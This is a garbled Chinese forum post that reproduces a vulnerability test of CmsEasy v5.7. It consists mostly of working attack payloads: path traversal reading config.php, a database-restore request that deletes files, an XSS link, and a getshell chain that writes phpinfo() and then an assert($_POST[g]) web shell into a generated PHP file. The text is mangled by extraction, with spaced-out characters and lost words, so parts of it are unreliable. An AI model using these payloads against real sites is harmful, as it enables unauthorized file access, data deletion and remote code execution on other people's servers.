[844] 2018-03-05_CmsEasy_v5.7漏洞测试

文档创建者:s7ckTeam
浏览次数:11
最后更新:2025-01-16
2018-03-05_CmsEasy_v5.7漏洞测试 0 1 0 2 0 3 0 4 0 5 0 6 C m s E a s y _ v 5 . 7     B y p a s s   B y p a s s   2 0 1 8 - 0 3 - 0 5         C M S C m s E a s y h t t p : / / w w w . c m s e a s y . c n C m s E a s y _ v 5 . 7 _ U T F 8 - 0 2 0 8   h t t p : / / f t p . c m s e a s y . c n / C m s E a s y 5 . x / C m s E a s y _ 5 . 7 _ U T F - 8 _ 2 0 1 8 0 2 0 8 . z i p   h t t p : / / 1 2 7 . 0 . 0 . 1 / i n d e x . p h p ? c a s e = a d m i n & a c t = l o g i n & a d m i n _ d i r = a d m i n & s i t e = d e f a u l t C M S h t t p : / / 1 2 7 . 0 . 0 . 1 / c a c h e / d a t a / i n f . t x t   c o n f i g . p h p P a y l o a d h t t p : / / 1 2 7 . 0 . 0 . 1 / i n d e x . p h p ? c a s e = t e m p l a t e & a c t = f e t c h & a d m i n _ d i r = a d m i n & s i t e = d e f a u l t P O S T : & i d = . . / . . / c o n f i g / c o n f i g . p h p t e s t P a y l o a d h t t p : / / 1 2 7 . 0 . 0 . 1 / i n d e x . p h p ? c a s e = d a t a b a s e & a c t = r e s t o r e & a d m i n _ d i r = a d m i n & s i t e = d e f a u l t P O S T s e l e c t % 5 B % 5 D = . . / t e s t & s u b m i t = + % C 3 % 9 7 + % E 5 % 8 8 % A 0 % E 9 % 9 9 % A 4 + X S S - - - - - - P a y l o a d 1 1 1 1 1 1 1 1 1 1 < a   h r e f = h t t p : / / w w w . b a i d u . c o m > < / a > G e t s h e l l
/ l i b / t a b l e / t a b l e _ t e m p l a t e t a g w a p . p h p   3 - 2 0 1 .     c l a s s   t a b l e _ t e m p l a t e t a g   e x t e n d s   t a b l e _ m o d e   {     2 .             f u n c t i o n   v a i l d ( )   {     3 .                     i f ( ! f r o n t : : p o s t ( ' n a m e ' ) )   {     4 .                             f r o n t : : f l a s h ( ' ' ) ;     5 .                             r e t u r n   f a l s e ;     6 .                     }     7 .                     i f ( ! f r o n t : : p o s t ( ' t a g c o n t e n t ' ) )   {     8 .                             f r o n t : : f l a s h ( ' ' ) ;     9 .                             r e t u r n   f a l s e ;     1 0 .                 }     1 1 .                 r e t u r n   t r u e ;     1 2 .         }     1 3 .         f u n c t i o n   s a v e _ b e f o r e ( )   {     1 4 .                 i f ( ! f r o n t : : p o s t ( ' t a g f r o m ' ) )   f r o n t : : $ p o s t [ ' t a g f r o m ' ] = ' d e f i n e ' ;     1 5 .                 i f ( ! f r o n t : : p o s t ( ' a t t r 1 ' ) )   f r o n t : : $ p o s t [ ' a t t r 1 ' ] = ' 0 ' ;     1 6 .                 i f ( f r o n t : : $ p o s t [ ' t a g c o n t e n t ' ] )   f r o n t : : $ p o s t [ ' t a g c o n t e n t ' ]   =   h t m l s p e c i a l c h a r s _ d e c o d e ( f r o n t : : $ p o s t [ ' t a g c o n t e n t ' ] ) ;     1 7 .         }     1 8 . }                     使 h t m l s p e c i a l c h a r s _ d e c o d e   H T M L   " < "   " > " 使 P a y l o a d : 1 - - - - P a y l o a d   P a y l o a d   1 1 1 1 1 1 1 1 1 1 " ; } < ? p h p   p h p i n f o ( ) ? > 2 i d 访 h t t p : / / 1 2 7 . 0 . 0 . 1 / c o n f i g / t a g / c a t e g o r y _ 1 3 . p h p
0 7 3 P a y l o a d :   1 1 " ; } < ? p h p   a s s e r t ( $ _ P O S T [ g ] ) ; ? >         使 C M S B y p a s s A b o u t   M e W A F
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则